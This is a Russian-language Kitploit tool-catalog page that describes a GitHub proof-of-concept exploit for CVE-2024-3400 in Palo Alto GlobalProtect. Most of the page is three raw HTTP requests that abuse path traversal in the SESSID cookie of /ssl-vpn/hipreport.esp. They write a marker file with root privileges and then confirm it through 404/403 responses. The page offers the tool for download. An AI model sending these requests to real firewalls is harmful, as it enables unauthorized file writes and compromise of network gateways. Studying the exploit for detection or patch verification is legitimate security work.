Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3400-Palo-Alto-OS-Command-Injection — Эксплойт-доказательство концепции для CVE-2024-3400, уязвимости внедрения команд в Palo Alto GlobalProtect, демонстрирующий загрузку и проверку файлов с помощью специально сформированных HTTP-запросов. | Kitploit
Инструменты/GitHubGitHub/0xr2r/cve-2024-3400-palo-alto-os-command-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHub0xr2r/cve-2024-3400-palo-alto-os-command-injection

CVE-2024-3400-Palo-Alto-OS-Command-Injection

Эксплойт-доказательство концепции для CVE-2024-3400, уязвимости внедрения команд в Palo Alto GlobalProtect, демонстрирующий загрузку и проверку файлов с помощью специально сформированных HTTP-запросов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
622 лет назадЕщё не проверено

#Шаги :


#1. Проверьте, присутствует ли файл (0xr2r.txt) на устройстве, выполнив GET-запрос ниже, или мы можем проверить то же самое, открыв

https://domain.com/global-protect/portal/images/0xr2r.txt URL в браузере Если вы получите ответ 404, это означает, что файла нет.


root@kitploit:~


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2. Теперь поместите файл (0xr2r.txt) на устройство, выполнив POST-запрос ниже. Это создаст файл на устройстве по указанному пути с правами root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. Теперь, если вы снова попытаетесь получить доступ к файлам, вы должны получить 403 вместо 404. Это доказывает, что файл (0xr2r.txt) присутствует на устройстве с правами root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
Скачать инструмент